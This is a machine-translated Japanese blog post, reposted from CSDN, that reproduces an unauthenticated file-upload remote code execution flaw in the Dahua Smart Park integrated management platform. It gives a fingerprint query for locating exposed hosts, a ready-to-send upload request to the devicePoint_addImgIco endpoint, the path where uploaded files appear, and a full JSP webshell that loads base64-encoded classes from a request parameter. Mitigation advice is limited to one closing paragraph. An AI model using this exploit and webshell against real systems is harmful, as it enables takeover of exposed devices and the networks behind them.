Dahua Smart Park 統合管理プラットフォーム RCE 脆弱性の再発 (0day)

0x01 製品紹介

      「大華スマートパーク統合管理プラットフォーム」は、公園運営、リソース配分、インテリジェントサービスなどの機能を備えた総合管理プラットフォームです。このプラットフォームは、多様化する管理ニーズに合わせて公園のリソース配分を最適化するのを支援すると同時に、インテリジェントなサービスを提供することでユーザーエクスペリエンスを向上させることを目的としています。

0x02 脆弱性の概要

     Dahua Smart Park デバイスはファイル アップロード機能を公開しましたが、アップロードされるファイルの種類、サイズ、形式、パスなどを厳密に制限およびフィルタリングしていないため、攻撃者が悪意のあるファイルを作成してデバイスにアップロードし、使用することができます。この脆弱性により権限が取得され、任意のコマンドが実行されます。

0x03 再発環境

Intergraph フィンガープリント: web.body="/WPMS/asset/lib/gridster/"

 0x04 脆弱性の再発

 上記の状況では抜け穴があります

 実証実験

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

test123
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

アップロードしてみる 

URLを確認してください

http://ip:8314/upload/emap/society_new/回显的jsp文件名

PS: ファイルがアップロードされると、ここのポートはポート 8314 にリダイレクトされます。 

 アップロード

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0

--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="b.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

 接続してみる

 0x05 修復の提案

     関連システムを使用するユーザーは、できるだけ早くパッチを適用すると同時にアクセス元を制限し、大華スマートパークの総合管理プラットフォームを公衆ネットワークや安全でないネットワーク環境にさらさないようにすることをお勧めします。

おすすめ

転載: blog.csdn.net/qq_41904294/article/details/131740622